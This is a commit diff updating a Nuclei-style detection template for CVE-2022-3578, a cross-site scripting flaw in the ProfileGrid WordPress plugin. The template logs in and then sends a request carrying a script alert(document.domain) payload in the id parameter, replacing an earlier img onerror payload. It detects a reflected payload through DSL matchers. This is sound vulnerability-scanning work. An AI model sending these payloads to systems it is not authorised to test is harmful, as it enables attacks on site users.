Update CVE-2022-3578.yaml

cves/2022/CVE-2022-3578.yaml

@@ -1,7 +1,7 @@
 id: CVE-2022-3578
 
 info:
-  name: ProfileGrid < 5.1.1 - Reflected Cross-Site Scripting
+  name: ProfileGrid < 5.1.1 - Cross-Site Scripting
   author: theamanrawat
   severity: medium
   description: |
@@ -12,7 +12,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-3578
   metadata:
     verified: true
-  tags: cve,cve2022,wp-plugin,wp,xss,authenticated,wpscan,wordpress,profilegrid-user-profiles-groups-and-communities
+  tags: cve,cve2022,wp-plugin,wp,wordpress,xss,profilegrid,authenticated
 
 requests:
   - raw:
@@ -24,25 +24,16 @@ requests:
         log={{username}}&pwd={{password}}&wp-submit=Log+In
 
       - |
-        GET /wp-admin/admin.php?page=pm_add_group&id="><img+src+onerror%3Dalert(document.domain)> HTTP/1.1
+        GET /wp-admin/admin.php?page=pm_add_group&id="><script>alert%28document.domain%29<%2Fscript> HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true
     cookie-reuse: true
-    matchers-condition: and
     matchers:
-      - type: word
+      - type: dsl
-        part: body_2
+        dsl:
-        words:
+          - 'contains(all_headers_2, "text/html")'
-          - '<img src onerror=alert(document.domain)>'
+          - 'status_code_2 == 200'
-          - 'Extension Options'
+          - 'contains(body_2, "Extension Options")'
+          - 'contains(body_2, "<script>alert(document.domain)</script>&tab")'
         condition: and
-
-      - type: word
-        part: header_2
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200